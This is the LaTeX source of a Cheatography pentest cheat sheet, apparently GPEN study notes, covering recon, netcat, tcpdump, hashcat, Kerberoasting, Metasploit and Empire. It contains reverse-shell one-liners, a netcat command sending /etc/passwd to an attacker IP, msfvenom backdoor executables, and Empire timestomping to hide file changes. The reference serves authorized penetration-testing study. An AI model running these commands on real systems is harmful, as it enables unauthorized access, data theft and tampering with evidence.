% Cheatography-generated cheat sheet (Pentest command tools, GPEN based).
% Layout: this preamble, then one tabularx per topic inside a two-column
% multicols* environment. Every directive sits on its own line on purpose:
% a `%` comment runs to the end of the line, so packing several commands
% after a comment on one line would silently comment them out.
\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr} % For header and footer
\usepackage{multicol} % Allows multicols in tables
\usepackage{tabularx} % Intelligent column widths
\usepackage{tabulary} % Used in header and footer
\usepackage{hhline} % Border under tables
\usepackage{graphicx} % For images
\usepackage{xcolor} % For hex colours
%\usepackage[utf8x]{inputenc} % For unicode character support
% NOTE(review): the table text below contains UTF-8 characters (em dashes);
% a LaTeX kernel from 2018 or later reads UTF-8 by default, older kernels
% need \usepackage[utf8]{inputenc} re-enabled here.
\usepackage[T1]{fontenc} % Without this we get weird character replacements
\usepackage{colortbl} % For coloured tables
\usepackage{setspace} % For line height
\usepackage{lastpage} % Needed for total page number
\usepackage{seqsplit} % Splits long words.
%\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem} % For underlining links

% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath} % Symbols
\usepackage{MnSymbol} % Symbols
\usepackage{wasysym} % Symbols
%\usepackage[english,german,french,spanish,italian]{babel} % Languages

% Document Info (PDF metadata only; nothing here is typeset)
\author{Hey Mensh (HeyMensh)}
\pdfinfo{
  /Title (pentest-command-tools-gpen-based.pdf)
  /Creator (Cheatography)
  /Author (Hey Mensh (HeyMensh))
  /Subject (Pentest command Tools (GPEN Based) Cheat Sheet)
}

% Lengths and widths
% The text block is widened and shifted by hand instead of via geometry;
% the four \addtolength values below belong together.
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
% seqsplit break points: a discretionary hyphen in text, a plain break in math
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit

% These two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands
% \SetRowColor{<colour>}: colour the current table row. The colour name is
% stored globally (\gdef inside \noalign, i.e. between rows) so that
% \mymulticolumn can pick it up again for the background of a spanning cell.
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour
% \mymulticolumn{<cols>}{<spec>}{<text>}: \multicolumn whose cell background
% is the colour last set by \SetRowColor.
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols
% x{<width>}: ragged-right paragraph column (used for every table column below)
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
% \raggedright inside a cell redefines \\, so rows end with \tabularnewline
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{4A4A4A}
\definecolor{LightBackground}{HTML}{F3F3F3}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
% Header: three columns -- logo, title/author, (empty).
% NOTE(review): the logo is referenced by an absolute path on the generating
% server; to compile elsewhere, place a copy locally and point this at it.
% NOTE(review): \large{\bf{...}} uses plain-TeX font switches; the LaTeX2e
% forms would be \bfseries / \textbf, but the rendering here is as intended.
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
\SetRowColor{DarkBackground}
\vspace{-7pt}
{\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
\hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}}
}
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
\vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Pentest command Tools (GPEN Based) Cheat Sheet}}}} \\
\normalsize{by \textcolor{DarkBackground}{Hey Mensh (HeyMensh)} via \textcolor{DarkBackground}{\uline{cheatography.com/150100/cs/32550/}}}
\end{tabulary}
\end{multicols}}

% Footer: three columns -- author, publication dates / page count, sponsor.
% \pageref{LastPage} comes from the lastpage package loaded above.
\fancyfoot[L]{
\footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
\SetRowColor{FootBackground}
\mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\
\vspace{-2pt}Hey Mensh (HeyMensh) \\
\uline{cheatography.com/heymensh} \\
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
\SetRowColor{FootBackground}
\mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\
\vspace{-2pt}Published 23rd November, 2022.\\
Updated 23rd November, 2022.\\
Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
\SetRowColor{FootBackground}
\mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\
\SetRowColor{white}
\vspace{-5pt}
%\includegraphics[width=48px,height=48px]{dave.jpeg}
Measure your website readability!\\
www.readability-score.com
\end{tabulary}
\end{multicols}}

\begin{document}
\raggedright
\raggedcolumns

% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.

\begin{multicols*}{2}

\begin{tabularx}{8.4cm}{x{3.52 cm} x{4.48 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{General Recon}} \tn
% Row 0
\SetRowColor{LightBackground}
`fping -g x.x.x.0 x.x.x.254 -a` & {\bf{Ping}} sweep \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Linux traceroute Options}}} \tn
% Row Count 3 (+ 1)
% Row 2
\SetRowColor{LightBackground}
`-4` & Forces IPv4 \tn
% Row Count 4 (+ 1)
% Row 3
\SetRowColor{white}
`-6` & Forces IPv6, same as the traceroute6 command \tn
% Row Count 6 (+ 2)
% Row 4
\SetRowColor{LightBackground}
`-I` & Uses ICMP echo \tn
% Row Count 7 (+ 1)
% Row 5
\SetRowColor{white}
`-T` & Uses TCP SYN \tn
% Row Count 8 (+ 1)
% Row 6
\SetRowColor{LightBackground}
`-f \textless{}first\_ttl\textgreater{}` & Starts from the hop specified instead of 1 \tn
% Row Count 10 (+ 2)
% Row 7
\SetRowColor{white}
`-g \textless{}gateway\textgreater{}` & Routes packets through the gateway specified instead of the default \tn
% Row Count 14 (+ 4)
% Row 8
\SetRowColor{LightBackground}
`-m \textless{}max\_ttls\textgreater{}` & Specifies the maximum number of hops; default is 30 \tn
% Row Count 17 (+ 3)
% Row 9
\SetRowColor{white}
`-n` & Specifies not to resolve IP addresses to hostnames \tn
% Row Count 20 (+ 3)
% Row 10
\SetRowColor{LightBackground}
`-w \textless{}wait\textgreater{}` & Specifies the wait time, which can be in seconds or relative
to the reply time between hops \tn
% Row Count 25 (+ 5)
% Row 11
\SetRowColor{white}
`-p \textless{}port\textgreater{}` & Specifies the port \tn
% Row Count 26 (+ 1)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{DNS Query}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{nslookup}}} \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
`nslookup -norecurse -type=A google.com DNS\_SRVR\_IP` & DNS Snooping | nonrecursive query \tn
% Row Count 4 (+ 3)
% Row 2
\SetRowColor{LightBackground}
`server {[}serverIPaddr or name{]}` & use a specific server \tn
% Row Count 6 (+ 2)
% Row 3
\SetRowColor{white}
`set type=any` & set DNS record type \tn
% Row Count 7 (+ 1)
% Row 4
\SetRowColor{LightBackground}
`ls -d {[}target\_domain{]}` & Perform a zone transfer of all records for a given domain \tn
% Row Count 10 (+ 3)
% Row 5
\SetRowColor{white}
`ls -d {[}target\_\_domain{]} {[}\textgreater{} filename{]}` & Store zone transfer output in a file \tn
% Row Count 12 (+ 2)
% Row 6
\SetRowColor{LightBackground}
`view {[}filename{]}` & view file \tn
% Row Count 13 (+ 1)
% Row 7
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{dig} \tn
% Row Count 14 (+ 1)
% Row 8
\SetRowColor{LightBackground}
`dig @{[}name server{]} {[}domain name{]} {[}record type{]}` & dig command syntax \tn
% Row Count 17 (+ 3)
% Row 9
\SetRowColor{white}
`dig +nocomments @192.168.1.50 lab.local -t AXFR` & test if the server allows anonymous zone transfers \tn
% Row Count 20 (+ 3)
% Row 10
\SetRowColor{LightBackground}
set norecurse & no recursive query, RD=0 \tn
% Row Count 22 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Netcat}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Flags}}} \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
`-l` & Listen mode (default is client) \tn
% Row Count 3 (+ 2)
% Row 2
\SetRowColor{LightBackground}
`-L` & Listen harder (Windows only) — Make a persistent listener \tn
% Row Count 6 (+ 3)
% Row 3
\SetRowColor{white}
`-u` & UDP mode (default is TCP) \tn
% Row Count 8 (+ 2)
% Row 4
\SetRowColor{LightBackground}
`-p` & Local port (In listen mode, this is the port listened on for connections. In client mode, this is the source port for packets sent.) \tn
% Row Count 14 (+ 6)
% Row 5
\SetRowColor{white}
`-e \textless{}filename\textgreater{}` & Program to execute after a connection occurs \tn
% Row Count 17 (+ 3)
% Row 6
\SetRowColor{LightBackground}
`-n` & Don't resolve names \tn
% Row Count 19 (+ 2)
% Row 7
\SetRowColor{white}
`-z` & Zero-I/O mode: Don't send any data, just emit packets \tn
% Row Count 22 (+ 3)
% Row 8
\SetRowColor{LightBackground}
`-w{[}N{]}` & Timeout for connects, waits for N seconds \tn
% Row Count 25 (+ 3)
% Row 9
\SetRowColor{white}
`-v` & Be verbose, printing when a connection is made \tn
% Row Count 28 (+ 3)
% Row 10
\SetRowColor{LightBackground}
`nc -e` & executes a command upon connection \tn
% Row Count 30 (+ 2)
\end{tabularx}
\par\addvspace{1.3em}
\vfill
\columnbreak

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Netcat (cont)}} \tn
% Row 11
\SetRowColor{LightBackground}
`-vv` & Be verbose, printing when connections are made, dropped, and so on \tn
% Row Count 4 (+ 4)
% Row 12
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{General}}} \tn
% Row Count 5 (+ 1)
% Row 13
\SetRowColor{LightBackground}
`nc -lvnp XX` & Server listen, verbose, no DNS, on port XX \tn
% Row Count 8 (+ 3)
% Row 14
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{SHELLS}}} \tn
% Row Count 9 (+ 1)
% Row 15
\SetRowColor{LightBackground}
`nc IP PORT -e /bin/bash` & Client reverse shell \tn
% Row Count 11 (+ 2)
% Row 16
\SetRowColor{white}
`rm -f /tmp/f ; mkfifo /tmp/f ; cat /tmp/f|/bin/sh -i 2\textgreater{}\&1|nc \$RHOST \$RPORT \textgreater{}/tmp/f` & netcat -e alternative example \tn
% Row Count 16 (+ 5)
% Row 17
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{On target:} \tn
% Row Count 17 (+ 1)
% Row 18
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{`mknod backpipe p`} \tn
% Row Count 18 (+ 1)
% Row 19
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{`nc -{}-1 -p {[}allowed\_inbound\_port{]} 0\textless{}backpipe | nc 127.0.0.1 22 1\textgreater{}backpipe`} \tn
% Row Count 20 (+ 2)
% Row 20
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{Attacker's machine to connect:} \tn
% Row Count 21 (+ 1)
% Row 21
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{`ssh login\_name@{[}targetmachine{]} -p {[}allowed\_inbound\_port{]}`} \tn
% Row Count 23 (+ 2)
% Row 22
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{A really good explanation of this is in the 560.3 book, p.~152} \tn
% Row Count 25 (+ 2)
% Row 23
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Send Files}}} \tn
% Row Count 26 (+ 1)
% Row 24
\SetRowColor{white}
`nc -l -p 8080 \textgreater{} filename` & set up listener and output file \tn
% Row Count 28 (+ 2)
% Row 25
\SetRowColor{LightBackground}
`nc -w 3 attackerIP 8080 \textless{} /etc/passwd` & sends file to netcat listener with 3 secs timeout \tn
% Row Count 31 (+ 3)
\end{tabularx}
\par\addvspace{1.3em}
\vfill
\columnbreak

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Netcat (cont)}} \tn
% Row 26
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Scan ports}}} \tn
% Row Count 1 (+ 1)
% Row 27
\SetRowColor{white}
`nc -v -n IP port` & test 1 port \tn
% Row Count 2 (+ 1)
% Row 28
\SetRowColor{LightBackground}
`nc -v -w 2 -z IP\_Address port\_range` & port range \tn
% Row Count 4 (+ 2)
% Row 29
\SetRowColor{white}
`echo "" | nc -v -n —w1
{[}targetIP{]} {[}port—range{]}` & a port scanner that harvests banners \tn
% Row Count 7 (+ 3)
% Row 30
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Other Uses}}} \tn
% Row Count 8 (+ 1)
% Row 31
\SetRowColor{white}
`while (true); do no -vv -z -w3 {[}targeb\_IP{]} {[}target\_port{]} \textgreater{} /dev/null \&\& echo -e "\textbackslash{}x07"; sleep 1; done` & Service-is-alive heartbeat \tn
% Row Count 14 (+ 6)
% Row 32
\SetRowColor{LightBackground}
`while \textbackslash{}`nc —vv -z —w3 {[}target\_IP{]} {[}target\_port{]} \textgreater{} /dev/null\textbackslash{}` ;do echo "Service is ok"; sleep 1; done; echo "Service is dead"; echo —e "\textbackslash{}x07" ` & Service-is-dead notification \tn
% Row Count 22 (+ 8)
% Row 33
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{alternative}}} \tn
% Row Count 23 (+ 1)
% Row 34
\SetRowColor{LightBackground}
`nc -n -v -l -p 2222 \textless{} /tmp/winauth.pcap` & Set up listener that will send the file \tn
% Row Count 26 (+ 3)
% Row 35
\SetRowColor{white}
`nc.exe -n -v -w3 {[}YourLinuxIPaddr{]} 2222 \textgreater{}C:\textbackslash{}folder\textbackslash{}winauth.pcap` & Client to receive and save the file \tn
% Row Count 30 (+ 4)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{3.04 cm} x{4.96 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{TCPDUMP | Monitoring}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{General}}} \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
`tcpdump -nnv -i eth0` & start capturing traffic \tn
% Row Count 3 (+ 2)
% Row 2
\SetRowColor{LightBackground}
`-n` & Use numbers instead of names for machines \tn
% Row Count 5 (+ 2)
% Row 3
\SetRowColor{white}
`-nn` & Use numbers for machines and ports \tn
% Row Count 7 (+ 2)
% Row 4
\SetRowColor{LightBackground}
`-i` & Sniff on a particular interface (-D lists interfaces) \tn
% Row Count 10 (+ 3)
% Row 5
\SetRowColor{white}
`-v` & Be verbose \tn
% Row Count 11 (+ 1)
% Row 6
\SetRowColor{LightBackground}
`-w` & Dump packets to a file (use -r to read the file later) \tn
% Row Count 14 (+ 3)
% Row 7
\SetRowColor{white}
`-x` & Print hex \tn
% Row Count 15 (+ 1)
% Row 8
\SetRowColor{LightBackground}
`-X` & Print hex and ASCII \tn
% Row Count 16 (+ 1)
% Row 9
\SetRowColor{white}
`-A` & Print ASCII \tn
% Row Count 17 (+ 1)
% Row 10
\SetRowColor{LightBackground}
`-s {[}snaplen{]}` & Sniff this many bytes from each frame, instead of the default \tn
% Row Count 20 (+ 3)
% Row 11
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Protocol:}}} \tn
% Row Count 21 (+ 1)
% Row 12
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{`ether, ip, ip6 , arp, rarp, tcp, udp: protocol type`} \tn
% Row Count 23 (+ 2)
% Row 13
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Type:}}} \tn
% Row Count 24 (+ 1)
% Row 14
\SetRowColor{LightBackground}
`host {[}host{]}` & Only give me packets to or from that host \tn
% Row Count 26 (+ 2)
% Row 15
\SetRowColor{white}
`net {[}network{]}` & Only packets for a given network \tn
% Row Count 28 (+ 2)
% Row 16
\SetRowColor{LightBackground}
`port {[}portnum{]}` & Only packets for that port \tn
% Row Count 30 (+ 2)
\end{tabularx}
\par\addvspace{1.3em}
\vfill
\columnbreak

\begin{tabularx}{8.4cm}{x{3.04 cm} x{4.96 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{TCPDUMP | Monitoring (cont)}} \tn
% Row 17
\SetRowColor{LightBackground}
`portrange {[}start-end{]}` & Only packets in that range of ports \tn
% Row Count 2 (+ 2)
% Row 18
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Direction:}}} \tn
% Row Count 3 (+ 1)
% Row 19
\SetRowColor{LightBackground}
`src` & Only give me packets from that host or port \tn
% Row Count 5 (+ 2)
% Row 20
\SetRowColor{white}
`dst` & Only give me packets to that host \tn
% Row Count 7 (+ 2)
% Row 21
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{Use `and` / `or` to
combine these together} \tn
% Row Count 8 (+ 1)
% Row 22
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{Wrap in parentheses to group elements together} \tn
% Row Count 9 (+ 1)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Hashcat}} \tn
% Row 0
\SetRowColor{LightBackground}
`hashcat -m 1800 -a 0 -o found1.txt crack1.hash 500\_passwords.txt` & crack {\bf{Linux SHA512}} password with a dictionary \tn
% Row Count 4 (+ 4)
% Row 1
\SetRowColor{white}
`hashcat -{}-force -m 13100 -a 0 lab3.hashcat /path/to/Dict.txt -{}-show` & Crack {\bf{Kerberos Service Ticket}} for account password \tn
% Row Count 8 (+ 4)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{2.56 cm} x{5.44 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{PowerSploit/PowerView}} \tn
% Row 0
\SetRowColor{LightBackground}
\seqsplit{`Invoke-Kerberoast`} & Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes \tn
% Row Count 4 (+ 4)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{3.92 cm} x{4.08 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Metasploit}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Create Handler listener}}} \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{`use exploit/multi/handler`} \tn
% Row Count 2 (+ 1)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{`set payload \seqsplit{windows/x64/meterpreter/reverse\_https`} OR \seqsplit{`windows/meterpreter/reverse\_tcp`}} \tn
% Row Count 4 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{`set lhost AttackerIP`} \tn
% Row Count 5 (+ 1)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{`set lport 443`} \tn
% Row Count 6 (+ 1)
% Row 5
\SetRowColor{white}
`exploit -j -z` & Run in background \tn
% Row Count 7 (+ 1)
% Row 6
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{PS Session with valid creds}}} \tn
% Row Count 8 (+ 1)
% Row 7
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{`use \seqsplit{auxiliary/admin/smb/psexec\_command`}} \tn
% Row Count 9 (+ 1)
% Row 8
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{`set smbuser user`} \tn
% Row Count 10 (+ 1)
% Row 9
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{`set rhost victimIP`} \tn
% Row Count 11 (+ 1)
% Row 10
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{`set smbpass P4\$\$`} \tn
% Row Count 12 (+ 1)
% Row 11
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{`set command "ipconfig or any command"`} \tn
% Row Count 13 (+ 1)
% Row 12
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{`run`} \tn
% Row Count 14 (+ 1)
% Row 13
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Create backdoor - recognized by Defender :( }}} \tn
% Row Count 15 (+ 1)
% Row 14
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{`msfvenom -p \seqsplit{windows/shell/reverse\_tcp} LHOST= {[}AttackerIP{]} LPORT=8080 -f exe \textgreater{} /tmp/file.exe`} \tn
% Row Count 17 (+ 2)
% Row 15
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{`msfvenom -p \seqsplit{windows/x64/meterpreter\_reverse\_https} LHOST=AttackerIP LPORT=443 -f exe -o pwned.exe`} \tn
% Row Count 19 (+ 2)
% Row 16
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Others}}} \tn
% Row Count 20 (+ 1)
% Row 17
\SetRowColor{white}
`sessions -l` & get a list of sessions \tn
% Row Count 22 (+ 2)
% Row 18
\SetRowColor{LightBackground}
`sessions -i {[}N{]}` & interact (-i) with session number {[}N{]} \tn
% Row Count 24 (+ 2)
% Row 19
\SetRowColor{white}
`press CTRL-Z` & Background session \tn
% Row Count 25 (+ 1)
% Row 20
\SetRowColor{LightBackground}
`jobs` & get background jobs
\tn
% Row Count 26 (+ 1)
% Row 21
\SetRowColor{white}
`db\_import \seqsplit{/path/to/file/nmap.xml`} & Import scans from nmap \tn
% Row Count 28 (+ 2)
% Row 22
\SetRowColor{LightBackground}
`hosts -m "Windows 10" 192.168.1.10` & Add comment to host \tn
% Row Count 30 (+ 2)
\end{tabularx}
\par\addvspace{1.3em}
\vfill
\columnbreak

\begin{tabularx}{8.4cm}{x{3.92 cm} x{4.08 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Metasploit (cont)}} \tn
% Row 23
\SetRowColor{LightBackground}
`services -u -p 135,445` & Show hosts that are up with ports 135,445 \tn
% Row Count 2 (+ 2)
% Row 24
\SetRowColor{white}
`sessions -h` & list help for the sessions command \tn
% Row Count 4 (+ 2)
% Row 25
\SetRowColor{LightBackground}
`sessions -K` & kill a session \tn
% Row Count 5 (+ 1)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Empire}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{set up an Empire HTTP listener}}} \tn
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{`usestager windows/launcher\_bat`} \tn
% Row Count 2 (+ 1)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{`set Listener http`} \tn
% Row Count 3 (+ 1)
% Row 3
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{`execute`} \tn
% Row Count 4 (+ 1)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{`General`} \tn
% Row Count 5 (+ 1)
% Row 5
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{`list agents`} \tn
% Row Count 6 (+ 1)
% Row 6
\SetRowColor{LightBackground}
`interact AGENTID` & choose an agent \tn
% Row Count 7 (+ 1)
% Row 7
\SetRowColor{white}
`download C:\textbackslash{}Users\textbackslash{}alice\textbackslash{}Desktop\textbackslash{}some.txt` & transfer file from agent PC \tn
% Row Count 10 (+ 3)
% Row 8
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Timestomping}}} \tn
% Row Count 11 (+ 1)
% Row 9
\SetRowColor{white}
`upload /tmp` & upload content from /tmp to the current session directory \tn
% Row Count 14 (+ 3)
% Row 10
\SetRowColor{LightBackground}
`usemodule \seqsplit{management/timestomp`} & load timestomp module \tn
% Row Count 16 (+ 2)
% Row 11
\SetRowColor{white}
`set ALL 03/02/2020 5:28 pm` & define the time to be set in all datetime file properties \tn
% Row Count 19 (+ 3)
% Row 12
\SetRowColor{LightBackground}
`set FilePath \seqsplit{bank\_login\_information}.txt` & set target file to be tampered with \tn
% Row Count 22 (+ 3)
% Row 13
\SetRowColor{white}
`execute` & run module \tn
% Row Count 23 (+ 1)
% Row 14
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{Others}}} \tn
% Row Count 24 (+ 1)
% Row 15
\SetRowColor{white}
\seqsplit{`/opt/Empire-master/downloads/`} & Empire downloads location \tn
% Row Count 26 (+ 2)
% Row 16
\SetRowColor{LightBackground}
`sell powershell Get-ChildItem` & Run PowerShell command \tn
% Row Count 28 (+ 2)
% Row 17
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{General}}} \tn
% Row Count 29 (+ 1)
% Row 18
\SetRowColor{LightBackground}
?
& Get command suggestions \tn
% Row Count 31 (+ 2)
\end{tabularx}
\par\addvspace{1.3em}
\vfill
\columnbreak

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Empire (cont)}} \tn
% Row 19
\SetRowColor{LightBackground}
searchmodule privesc & search for modules \tn
% Row Count 1 (+ 1)
% Row 20
\SetRowColor{white}
\mymulticolumn{2}{x{8.4cm}}{{\bf{configure a listener}}} \tn
% Row Count 2 (+ 1)
% Row 21
\SetRowColor{LightBackground}
listeners & get a list of our listeners \tn
% Row Count 4 (+ 2)
% Row 22
\SetRowColor{white}
options & options we have for our listeners \tn
% Row Count 6 (+ 2)
% Row 23
\SetRowColor{LightBackground}
set StagingKey {[}Some\_Secret\_Value{]} & configure a custom staging key for encrypting communications \tn
% Row Count 9 (+ 3)
% Row 24
\SetRowColor{white}
set DefaultDelay 1 & time between callbacks from our agent \tn
% Row Count 11 (+ 2)
% Row 25
\SetRowColor{LightBackground}
execute & launch listener \tn
% Row Count 12 (+ 1)
% Row 26
\SetRowColor{white}
list & check out our listeners \tn
% Row Count 14 (+ 2)
% Row 27
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{{\bf{deploy an agent}}} \tn
% Row Count 15 (+ 1)
% Row 28
\SetRowColor{white}
usestager & create and deploy an agent | {[}space{]}{[}TAB-TAB{]} to see available stagers \tn
% Row Count 19 (+ 4)
% Row 29
\SetRowColor{LightBackground}
usestager 1auncher\_bat & select stager \tn
% Row Count 21 (+ 2)
% Row 30
\SetRowColor{white}
info & get info for the current stager \tn
% Row Count 23 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{MSFDB - Metasploit Database}} \tn
% Row 0
